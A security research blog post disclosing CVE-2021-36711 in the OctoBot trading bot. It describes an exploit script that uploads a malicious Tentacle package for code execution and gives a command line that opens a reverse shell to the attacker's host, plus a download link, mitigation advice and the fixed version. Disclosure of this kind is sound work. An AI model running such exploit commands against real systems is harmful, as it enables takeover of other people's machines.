Airspan AirSpot 5410 - Vulnerability Report Buffalo BS-GS Series - Vulnerability report Buffalo BS-GSL2024/2016P/2016 Series - Vulnerability Report Buffalo VPN VR-S1000 - Vulnerability Report ChainIDE multichain IDE - Vulnerability report Contec FLEXLAN FXA2000 and FXA3000 series - Vulnerability report E-lins H685 Wireless Cellular Router/Modem vulnerabilities F-logic DataCube3 vulnerability report FLIR AX8 - Vulnerability report From upload feature to reverse shell, OctoBot Trading Bot | CVE-2021-36711 Hytec Inter HWL-2511-SS - Vulnerability Report ISnex series network monitoring system (Camera, Decoder, Encoder) - Vulnerability report Ledger Live CSV Injection vulnerability Planex network camera CS-QR10 and CS-QR20 - Vulnerability report | CVE-2022-38399

[CVE-2021-36711] Sashimi Evil OctoBot Tentacle

Sashimi Evil OctoBot Tentacle is a python script that exploits a vulnerability that lies in the Tentacles upload functionality of the cryptocurrency trading bot OctoBot which is designed to be easy to use and customizable. Indeed, this open source trading bot has the particularity of offering to theirs users the possibility to upload their own trading algorithms.

Sashimi Evil OctoBot Tentacle takes advantage of this feature to upload a malicious crafted package that leads to an arbitrary code execution.

Affected versions

All OctoBot versions until the latest version (0.4.0b12) are vulnerable. However, this exploit will work from version 0.4.0b3 until version 0.4.1.

Proof of concept

(PoC Tested on Octobot 0.4.0b10)

Funny isn't it?

More in depth tutorial video by @CodeMaru:

Requirement

  • Python 3 (Must already have it if you are OctoBot user :D)
    • An OctoBot target host platform.

      As usual the 3 scripts presented are open source and available on GitHub at the following address:

      python3 sashimi.py --RHOST TARGET_IP --RPORT TARGET_PORT --LHOST YOUR_IP --LPORT YOUR_OPEN_PORT

      Be patient for around 3 min, the time to download, create and upload the malicious Tentacle package, and you should have a remote access to the machine. That’s it!

      Mitigation

      To protect against this attack, set a password in your OctoBot platform or add an .htpasswd.

      [Update] A new version, 0.4.4, that fix the vulnerability has been released.

      https://github.com/Drakkar-Software/OctoBot/issues/1966

      Note

      FOR EDUCATIONAL PURPOSE ONLY.

      Reference

      https://nvd.nist.gov/vuln/detail/CVE-2021-36711

      Download

      https://gitlab.com/0xSamy/Sashimi-Evil-OctoBot-Tentacle

        Thanks for reading this article! I hope you could learn something through our research! If you liked what you read, please share and follow us on twitter at @NeroTeamLabs

      Security researchers